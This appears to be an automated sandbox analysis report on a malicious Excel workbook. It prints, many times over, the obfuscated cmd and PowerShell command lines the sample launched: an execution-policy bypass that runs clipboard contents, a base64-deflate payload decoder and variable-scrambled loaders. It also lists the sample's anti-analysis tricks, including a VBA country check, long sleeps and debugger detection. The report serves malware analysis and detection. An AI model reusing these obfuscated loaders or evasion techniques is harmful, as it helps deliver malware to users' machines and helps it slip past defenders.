Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'ntJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'ntJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
PowerShell case anomaly found
Source: unknown | Process created: C:\Windows\System32\cmd.exe | Command line: cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Command line: poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe | Command line: cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Command line: poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\clip.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Document contains an embedded VBA which only executes on specific systems (country or language check)
Source: 20310_011_11353_0_88.xls | Stream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : Open()If Application.International(xlCountrySetting) = 39 T
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1348 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2044 | Thread sleep time: -922337203685477s >= -30000s
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: KernelDebuggerInformation
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe | Command line: Cmd /C %QJi:''='%
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe | Command line: C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\clip.exe | Command line: cLiP
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe | Command line: cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Command line: poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\cmd.exe | Command line: CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt
Source: unknown | Process created: C:\Windows\System32\cmd.exe | Command line: C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'ntJump to behavior
